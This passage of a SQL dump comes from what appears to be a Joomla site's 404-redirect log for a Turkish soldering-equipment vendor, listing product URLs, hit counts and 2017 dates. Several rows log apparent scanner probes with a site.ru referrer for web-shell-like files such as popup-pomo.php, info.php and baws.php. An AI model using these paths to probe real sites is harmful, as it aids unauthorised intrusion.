00:00:00',301),(12861,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-20',NULL,'','',1,0,'2017-11-21 03:28:49','0000-00-00 00:00:00',301),(12862,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/results,1-50',NULL,'','',5,0,'2017-11-21 03:33:37','0000-00-00 00:00:00',301),(12863,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name?language=en-gb',NULL,'','',2,0,'2017-11-21 03:39:42','0000-00-00 00:00:00',301),(12864,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-21 03:41:38','0000-00-00 00:00:00',301),(12865,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-21 03:57:37','0000-00-00 00:00:00',301),(12866,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,category_name?language=en-gb',NULL,'','',18,0,'2017-11-21 04:05:15','0000-00-00 00:00:00',301),(12867,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name/results,1-50',NULL,'','',4,0,'2017-11-21 04:31:13','0000-00-00 00:00:00',301),(12868,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',3,0,'2017-11-21 04:36:01','0000-00-00 00:00:00',301),(12869,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/rh2-detail?tmpl=component&print=1',NULL,'','',25,0,'2017-11-21 04:37:31','0000-00-00 00:00:00',301),(12870,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-40',NULL,'','',1,0,'2017-11-21 04:50:25','0000-00-00 00:00:00',301),(12871,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,`p`.product_sku?language=en-gb',NULL,'','',24,0,'2017-11-21 04:58:36','0000-00-00 00:00:00',301),(12872,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/tolo?tmpl=component',NULL,'','',1,0,'2017-11-21 04:59:57','0000-00-00 00:00:00',301),(12873,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',8,0,'2017-11-21 05:04:37','0000-00-00 00:00:00',301),(12874,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc/results,1-20',NULL,'','',9,0,'2017-11-21 05:09:37','0000-00-00 00:00:00',301),(12875,'http://3s-technologies.com.tr/tr/urunler/le-40v-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-21 05:19:14','0000-00-00 00:00:00',301),(12876,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name',NULL,'','',5,0,'2017-11-21 05:38:25','0000-00-00 00:00:00',301),(12877,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-21 05:43:12','0000-00-00 00:00:00',301),(12878,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-21 05:58:43','0000-00-00 00:00:00',301),(12879,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name/dirdesc?language=en-gb',NULL,'','',7,0,'2017-11-21 06:02:48','0000-00-00 00:00:00',301),(12880,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku/results,1-10',NULL,'','',6,0,'2017-11-21 06:07:12','0000-00-00 00:00:00',301),(12881,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-21 06:20:48','0000-00-00 00:00:00',301),(12882,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,category_name?language=en-gb',NULL,'','',7,0,'2017-11-21 06:36:33','0000-00-00 00:00:00',301),(12883,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,product_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 06:44:01','0000-00-00 00:00:00',301),(12884,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-21 06:50:25','0000-00-00 00:00:00',301),(12885,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,`p`.product_sku/results,1-5',NULL,'','',7,0,'2017-11-21 06:55:12','0000-00-00 00:00:00',301),(12886,'http://3s-technologies.com.tr/en/products/jv131-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-11-21 06:57:02','0000-00-00 00:00:00',301),(12887,'http://3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/content-modules/most-read/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-11-21 06:58:25','0000-00-00 00:00:00',301),(12888,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,category_name',NULL,'','',6,0,'2017-11-21 07:00:00','0000-00-00 00:00:00',301),(12889,'http://www.3s-technologies.com.tr/index.php/en/products/rh6-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-11-21 07:01:55','0000-00-00 00:00:00',301),(12890,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-11-21 07:10:16','0000-00-00 00:00:00',301),(12891,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',18,0,'2017-11-21 07:23:29','0000-00-00 00:00:00',301),(12892,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer?language=tr-tr',NULL,'','',30,0,'2017-11-21 07:35:18','0000-00-00 00:00:00',301),(12893,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-21 07:35:53','0000-00-00 00:00:00',301),(12894,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,`p`.product_sku',NULL,'','',1,0,'2017-11-21 07:57:36','0000-00-00 00:00:00',301),(12895,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,mf_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-21 08:02:24','0000-00-00 00:00:00',301),(12896,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/by,mf_name/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-11-21 08:10:28','0000-00-00 00:00:00',301),(12897,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-21 08:25:14','0000-00-00 00:00:00',301),(12898,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku',NULL,'','',35,0,'2017-11-21 08:28:03','0000-00-00 00:00:00',301),(12899,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-21 08:38:13','0000-00-00 00:00:00',301),(12900,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-11-21 08:38:29','0000-00-00 00:00:00',301),(12901,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-21 08:42:46','0000-00-00 00:00:00',301),(12902,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/npm-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-21 08:45:27','0000-00-00 00:00:00',301),(12903,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',59,0,'2017-11-21 08:52:00','0000-00-00 00:00:00',301),(12904,'http://3s-technologies.com.tr/en/products/manufacturers/ddm-novastar',NULL,'','',35,0,'2017-11-21 09:00:59','0000-00-00 00:00:00',301),(12905,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,pc.ordering,product_name',NULL,'','',3,0,'2017-11-21 09:09:25','0000-00-00 00:00:00',301),(12906,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-21 09:24:11','0000-00-00 00:00:00',301),(12907,'http://3s-technologies.com.tr/en/products/screen-printer/by,product_name',NULL,'','',18,0,'2017-11-21 09:47:42','0000-00-00 00:00:00',301),(12908,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,`p`.product_sku/results,1-20',NULL,'','',5,0,'2017-11-21 09:49:25','0000-00-00 00:00:00',301),(12909,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 09:52:35','0000-00-00 00:00:00',301),(12910,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-21 10:07:12','0000-00-00 00:00:00',301),(12911,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/dirdesc',NULL,'','',2,0,'2017-11-21 10:11:38','0000-00-00 00:00:00',301),(12912,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-21 10:19:34','0000-00-00 00:00:00',301),(12913,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-21 10:36:01','0000-00-00 00:00:00',301),(12914,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,`p`.product_sku/results,1-50',NULL,'','',3,0,'2017-11-21 10:47:12','0000-00-00 00:00:00',301),(12915,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',29,0,'2017-11-21 10:57:43','0000-00-00 00:00:00',301),(12916,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-21 11:03:01','0000-00-00 00:00:00',301),(12917,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-37-detail',NULL,'','',31,0,'2017-11-21 11:07:26','0000-00-00 00:00:00',301),(12918,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-21 11:09:25','0000-00-00 00:00:00',301),(12919,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-5',NULL,'','',2,0,'2017-11-21 11:13:52','0000-00-00 00:00:00',301),(12920,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 11:20:36','0000-00-00 00:00:00',301),(12921,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',9,0,'2017-11-21 11:24:00','0000-00-00 00:00:00',301),(12922,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-11-21 11:27:07','0000-00-00 00:00:00',301),(12923,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2017-11-21 11:40:31','0000-00-00 00:00:00',301),(12924,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-50',NULL,'','',10,0,'2017-11-21 11:44:58','0000-00-00 00:00:00',301),(12925,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,product_sku?language=en-gb',NULL,'','',29,0,'2017-11-21 11:56:34','0000-00-00 00:00:00',301),(12926,'http://3s-technologies.com.tr/index.php/en/products/flux',NULL,'','',17,0,'2017-11-21 12:07:58','0000-00-00 00:00:00',301),(12927,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-21 12:17:19','0000-00-00 00:00:00',301),(12928,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'http://site.ru','',28,0,'2017-11-21 12:24:04','0000-00-00 00:00:00',301),(12929,'http://3s-technologies.com.tr/tr/htaccess.php',NULL,'http://site.ru','',97,0,'2017-11-21 12:24:58','0000-00-00 00:00:00',301),(12930,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/trident-detail',NULL,'','',28,0,'2017-11-21 12:28:38','0000-00-00 00:00:00',301),(12931,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,product_name/dirdesc',NULL,'','',4,0,'2017-11-21 12:38:18','0000-00-00 00:00:00',301),(12932,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/results,1-10',NULL,'','',4,0,'2017-11-21 12:40:53','0000-00-00 00:00:00',301),(12933,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,pc.ordering,product_name/results,1-5',NULL,'','',4,0,'2017-11-21 12:47:11','0000-00-00 00:00:00',301),(12934,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc',NULL,'','',4,0,'2017-11-21 12:51:38','0000-00-00 00:00:00',301),(12935,'http://3s-technologies.com.tr/tr/manager/popup-pomo.php',NULL,'http://site.ru','',10,0,'2017-11-21 12:52:10','0000-00-00 00:00:00',301),(12936,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/results,1-20',NULL,'','',4,0,'2017-11-21 13:13:52','0000-00-00 00:00:00',301),(12937,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,mf_name?language=tr-tr',NULL,'','',13,0,'2017-11-21 13:14:36','0000-00-00 00:00:00',301),(12938,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',30,0,'2017-11-21 13:24:26','0000-00-00 00:00:00',301),(12939,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,category_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-11-21 13:27:12','0000-00-00 00:00:00',301),(12940,'http://3s-technologies.com.tr/tr/content-wrapper.php',NULL,'http://site.ru','',2,0,'2017-11-21 13:29:56','0000-00-00 00:00:00',301),(12941,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/results,1-40',NULL,'','',1,0,'2017-11-21 13:31:21','0000-00-00 00:00:00',301),(12942,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-50',NULL,'','',4,0,'2017-11-21 13:31:39','0000-00-00 00:00:00',301),(12943,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',52,0,'2017-11-21 13:32:16','0000-00-00 00:00:00',301),(12944,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-21 13:49:24','0000-00-00 00:00:00',301),(12945,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer',NULL,'','',39,0,'2017-11-21 13:50:53','0000-00-00 00:00:00',301),(12946,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,ordering/results,1-20',NULL,'','',5,0,'2017-11-21 13:53:51','0000-00-00 00:00:00',301),(12947,'http://3s-technologies.com.tr/tr/parseopml/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-11-21 13:57:08','0000-00-00 00:00:00',301),(12948,'https://www.3s-technologies.com.tr/en/products/2.-el-makineler/avf-detail',NULL,'','',1,0,'2017-11-21 14:03:44','0000-00-00 00:00:00',301),(12949,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',4,0,'2017-11-21 14:07:11','0000-00-00 00:00:00',301),(12950,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',6,0,'2017-11-21 14:19:41','0000-00-00 00:00:00',301),(12951,'http://3s-technologies.com.tr/en/products/thru-hole/by,product_name',NULL,'','',7,0,'2017-11-21 14:30:57','0000-00-00 00:00:00',301),(12952,'http://3s-technologies.com.tr/tr/widgets/popup-pomo.php',NULL,'http://site.ru','',10,0,'2017-11-21 15:02:34','0000-00-00 00:00:00',301),(12953,'http://3s-technologies.com.tr/tr/permalink/popup-pomo.php',NULL,'http://site.ru','',11,0,'2017-11-21 15:02:44','0000-00-00 00:00:00',301),(12954,'http://3s-technologies.com.tr/index.php/en/products/krem-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-21 15:04:40','0000-00-00 00:00:00',301),(12955,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,pc.ordering,product_name/results,1-50',NULL,'','',3,0,'2017-11-21 15:22:44','0000-00-00 00:00:00',301),(12956,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-21 15:27:11','0000-00-00 00:00:00',301),(12957,'http://3s-technologies.com.tr/tr/baws.php',NULL,'http://site.ru','',6,0,'2017-11-21 15:28:09','0000-00-00 00:00:00',301),(12958,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_name/dirdesc?language=tr-tr',NULL,'','',25,0,'2017-11-21 15:33:57','0000-00-00 00:00:00',301),(12959,'http://3s-technologies.com.tr/index.php/tr/ueruenler/spartan-8s-8d-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-21 15:35:22','0000-00-00 00:00:00',301),(12960,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',409,0,'2017-11-21 15:44:17','0000-00-00 00:00:00',301),(12961,'http://www.3s-technologies.com.tr/index.php/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-21 15:51:05','0000-00-00 00:00:00',301),(12962,'http://3s-technologies.com.tr/tr/install/popup-pomo.php',NULL,'http://site.ru','',8,0,'2017-11-21 15:52:55','0000-00-00 00:00:00',301),(12963,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,mf_name/dirdesc?error=404&language=en-gb',NULL,'','',1,0,'2017-11-21 16:34:54','0000-00-00 00:00:00',301),(12964,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/results,1-10',NULL,'','',4,0,'2017-11-21 16:38:17','0000-00-00 00:00:00',301),(12965,'http://3s-technologies.com.tr/index.php/tr/ueruenler/rh2-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-21 16:40:19','0000-00-00 00:00:00',301),(12966,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2017-11-21 16:42:44','0000-00-00 00:00:00',301),(12967,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-11-21 16:47:11','0000-00-00 00:00:00',301),(12968,'http://3s-technologies.com.tr/tr/info.php',NULL,'http://site.ru','',474,0,'2017-11-21 16:52:51','0000-00-00 00:00:00',301),(12969,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/dirdesc?language=tr-tr',NULL,'','',26,0,'2017-11-21 17:02:57','0000-00-00 00:00:00',301),(12970,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-fırın/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-21 17:09:24','0000-00-00 00:00:00',301),(12971,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-20',NULL,'','',8,0,'2017-11-21 17:27:11','0000-00-00 00:00:00',301),(12972,'http://3s-technologies.com.tr/tr/pressthis/popup-pomo.php',NULL,'http://site.ru','',13,0,'2017-11-21 17:31:13','0000-00-00 00:00:00',301),(12973,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic',NULL,'','',40,0,'2017-11-21 17:37:28','0000-00-00 00:00:00',301),(12974,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı?language=en-gb',NULL,'','',1,0,'2017-11-21 17:40:31','0000-00-00 00:00:00',301),(12975,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/krem-lehim-31-32-detail',NULL,'','',17,0,'2017-11-21 17:50:26','0000-00-00 00:00:00',301),(12976,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-21 17:58:17','0000-00-00 00:00:00',301),(12977,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-21 18:02:44','0000-00-00 00:00:00',301),(12978,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',14,0,'2017-11-21 18:04:44','0000-00-00 00:00:00',301),(12979,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-detail',NULL,'','',39,0,'2017-11-21 18:09:04','0000-00-00 00:00:00',301),(12980,'http://3s-technologies.com.tr/tr/scripts/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-11-21 18:19:20','0000-00-00 00:00:00',301),(12981,'http://www.3s-technologies.com.tr/tr/?option=com_easyblog&view=dashboard&layout=write',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_easyblog&view=dashboard&layout=write','',23,0,'2017-11-21 19:03:29','0000-00-00 00:00:00',301),(12982,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/screen-printer/by,ordering/results,1-5',NULL,'','',1,0,'2017-11-21 19:04:57','0000-00-00 00:00:00',301),(12983,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,mf_name/results,1-5',NULL,'','',1,0,'2017-11-21 19:10:14','0000-00-00 00:00:00',301),(12984,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/by,category_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-21 19:20:50','0000-00-00 00:00:00',301),(12985,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-21 19:26:07','0000-00-00 00:00:00',301),(12986,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/screen-printer',NULL,'','',1,0,'2017-11-21 19:34:26','0000-00-00 00:00:00',301),(12987,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name',NULL,'','',5,0,'2017-11-21 19:34:29','0000-00-00 00:00:00',301),(12988,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku',NULL,'','',245,0,'2017-11-21 19:34:33','0000-00-00 00:00:00',301),(12989,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:34:37','0000-00-00 00:00:00',301),(12990,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name?language=en-gb',NULL,'','',11,0,'2017-11-21 19:34:57','0000-00-00 00:00:00',301),(12991,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 19:35:16','0000-00-00 00:00:00',301),(12992,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-21 19:35:24','0000-00-00 00:00:00',301),(12993,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 19:35:27','0000-00-00 00:00:00',301),(12994,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-21 19:35:31','0000-00-00 00:00:00',301),(12995,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı',NULL,'','',123,0,'2017-11-21 19:36:07','0000-00-00 00:00:00',301),(12996,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku?language=en-gb',NULL,'','',17,0,'2017-11-21 19:36:13','0000-00-00 00:00:00',301),(12997,'http://3s-technologies.com.tr/index.php/en/products/asp-300-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-21 19:36:30','0000-00-00 00:00:00',301),(12998,'http://3s-technologies.com.tr/index.php/en/products/rh2-20-detail?tmpl=component&print=1',NULL,'','',8,0,'2017-11-21 19:36:33','0000-00-00 00:00:00',301),(12999,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 19:36:38','0000-00-00 00:00:00',301),(13000,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/by,product_name',NULL,'','',230,0,'2017-11-21 19:36:43','0000-00-00 00:00:00',301),(13001,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-21 19:37:32','0000-00-00 00:00:00',301),(13002,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-21 19:37:52','0000-00-00 00:00:00',301),(13003,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:38:13','0000-00-00 00:00:00',301),(13004,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:38:40','0000-00-00 00:00:00',301),(13005,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:38:46','0000-00-00 00:00:00',301),(13006,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-21 19:38:52','0000-00-00 00:00:00',301),(13007,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-21 19:39:12','0000-00-00 00:00:00',301),(13008,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-21 19:39:44','0000-00-00 00:00:00',301),(13009,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-21 19:39:46','0000-00-00 00:00:00',301),(13010,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:39:52','0000-00-00 00:00:00',301),(13011,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-21 19:40:07','0000-00-00 00:00:00',301),(13012,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-21 19:40:14','0000-00-00 00:00:00',301),(13013,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-21 19:40:20','0000-00-00 00:00:00',301),(13014,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-21 